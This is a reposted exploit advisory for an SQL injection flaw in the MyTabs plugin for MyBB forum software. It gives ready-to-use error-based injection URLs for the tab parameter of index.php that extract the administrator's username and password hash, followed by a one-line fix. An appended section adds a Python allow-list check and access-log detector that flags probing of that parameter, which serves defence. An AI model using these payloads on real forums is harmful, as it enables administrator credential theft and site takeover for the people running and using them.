
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability and fix

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs

Vulnerability :

$~ http://www.2cto.com /mybbpath/index.php?tab=[SQLi]

---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

Fix: filter the input passed in the tab parameter of the index.php page.
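An added example, not part of the original advisory: a Python check that flags access-log requests to index.php whose tab value is not a plain integer, which is the allow-list the fix calls for and also a way to spot past probing of this parameter. It assumes tab is a numeric ID (the advisory's own requests use tab=1) and a combined-format access log; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tab values are short positive integers (the advisory's
# own requests use tab=1). [0-9] with fullmatch rejects Unicode digits (which
# str.isdigit() accepts) and a trailing newline (which a "$" anchor accepts).
VALID_TAB = re.compile(r"[0-9]{1,9}")
# Request line of a combined-format access log; .+? tolerates raw spaces.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')

def tab_is_valid(value):
    """Allow-list check: True only for a plain ASCII integer."""
    return VALID_TAB.fullmatch(value) is not None

def suspicious_tab_requests(log_lines):
    """Return (line_number, decoded tab value) for each non-integer tab."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # index.php may be requested by name or as the directory default
        if not url.path.endswith(("/index.php", "/")):
            continue
        # parse_qs percent-decodes values and returns every repeated "tab"
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("tab", []):
            if not tab_is_valid(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /mybbpath/index.php?tab=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] '
    '"GET /mybbpath/index.php?tab=1%27%20and(select%201)--%20- HTTP/1.1" 200 312',
    '198.51.100.9 - - [01/Jan/2024:10:00:04 +0000] '
    '"GET /mybbpath/index.php?tab=2&tab=2%27 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /mybbpath/showthread.php?tid=4 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_tab_requests(SAMPLE_LOG):
        print(f"line {number}: non-integer tab value {value!r}")
```

The same allow-list belongs in the application before the value reaches any query; log matching only shows that the parameter was probed, not whether data was returned.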

# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
